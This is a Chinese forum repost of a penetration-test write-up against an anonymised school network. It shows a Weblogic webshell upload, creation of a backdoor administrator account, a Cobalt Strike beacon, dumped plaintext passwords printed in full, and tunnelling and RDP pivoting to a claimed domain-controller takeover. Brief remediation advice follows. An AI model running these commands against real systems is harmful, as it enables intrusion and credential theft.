安全矩阵

 找回密码
 立即注册
搜索
查看: 718|回复: 0

XX单位内网渗透高开低走【运气好】

[复制链接]

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-3-25 22:10:31 | 显示全部楼层 |阅读模式
原文链接:XX单位内网渗透高开低走【运气好】
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好“设为星标”,否则可能就看不到了啦!

0x01 本次靶标

资产所属单位 :XX市XX学校
资产简称 :     XX学校
单位地理位置 :XX省XX区XX路88号
联系方式 :    666666
漏洞url :      http://XXXX:8001/
学校官网 :    http://www.XXX.com

0x02 外围打点

打点姿势:搜索其官网下的资产探测存在Weblogic资产且存在漏洞,上传冰蝎的木马且GetShell....
总结:打点玩的就是信息收集能力!!!

  1. #目标地址
  2. http://X.X.X.X:8001/
  3. #WebShell地址
  4. http://X.X.X.X:8001//wls-wsat/4pts.jsp
复制代码






0x03 内网信息收集

拿到webshell之后就开始收集主机上的信息方便进行内网渗透

  1. X.X.X.X  XX省XX市 移动
  2. #信息收集
  3. whoami      //server\administrator
  4. hostname    //SERVER
  5. tasklist /svc //火绒---》 没卵用
  6. net user hacker admi /add   
  7. net localgroup administrators hacker /add  
  8. net group /domain 无法连接到域控进行查询
  9. ipconfig /all  //10.10.180.8   10.10.180.10   10.10.180.11  svr.com(无法通信)
  10. ping svr.com  //无法ping通域控主机
复制代码


0x04 内网渗透

上传Fscan至隐藏目录下并上传上线CS马抓取其明文密码....

  1. #抓取的明文密码
  2. username:Administrator
  3. password:manager!@#123

  4. username:CLIUSR
  5. password:)+z|;!{V$VlcG6
  6. #Fscan扫描信息
  7. 10.10.180.3  //linux主机
  8. 10.10.180.7  //Win主机+hostname:DC2 怀疑是域控
  9. 10.10.180.9  //Win主机+hostname:HGSERVER2
  10. http://10.10.1.1:9002/  //windows主机且存在Weblogic反序列化漏洞
复制代码






这里我们整理下思路....上传Neo-Regorg搭建其通信隧道....

兄弟们重点来了,给我学!!!

目前我们已经拿下边界主机的网站后门与系统后门,其系统后门需要进一步做远程桌面连接进行验证;目前为域环境其目标是要拿下域控!尝试以下思路:

1、在WebShell中观察存在Administrator.HGSRV用户家目录,可窃取会话令牌仿冒身份操作;但上次登陆时间久远!(2021年)

2、尝试对其内网的10.10.180.67的Weblogic服务进行WEB攻击并在本地Kali连接其Shell进行下一步操作...

3、尝试PTH攻击如成功则信息收集接远程桌面....直到碰到域管理员账户踪影在进行后续的攻击利用(推荐)

4、直接收集域控信息,尝试域提权的漏洞,属于无脑莽就完事....(不推荐)



内网隧道

  1. #Neo-Regeorg 3.8.1
  2. http://X.X.X.X:8001//wls-wsat/t0l.jsp   123
  3. #proxychains配置
  4. vi vi /etc/proxychains4.conf
  5. socks5 127.0.0.1 1080

  6. #proxychains测试
  7. proxychains curl http://myip.ipip.net/
复制代码






配置好代理后执行以下命令登陆到边界主机的远程桌面...

  1. #连接命令
  2. proxychains rdesktop 10.10.180.8
  3. #用户备注
  4. username:Administrator
  5. password:manager!@#123
复制代码





在其边界主机系统中查看文件时发现磁盘空间较大且在服务器管理上显示做了存储池...



在存储池的F盘发现以下资料....并在资料中发现部署整个Windows集群的角色与账号密码及详细配置等信息....啊就离谱....





此时我们直接以边界主机为跳板对内部网络的主机进行桌面连接即可....至此拿下域控!!!










0x05 漏洞修复


升级Weblogic中间件并安装安装补丁

升级安全防护软件并设置修改密码锁

修改Hyper-V虚拟化程序至单台主机




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 21:44 , Processed in 0.012908 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表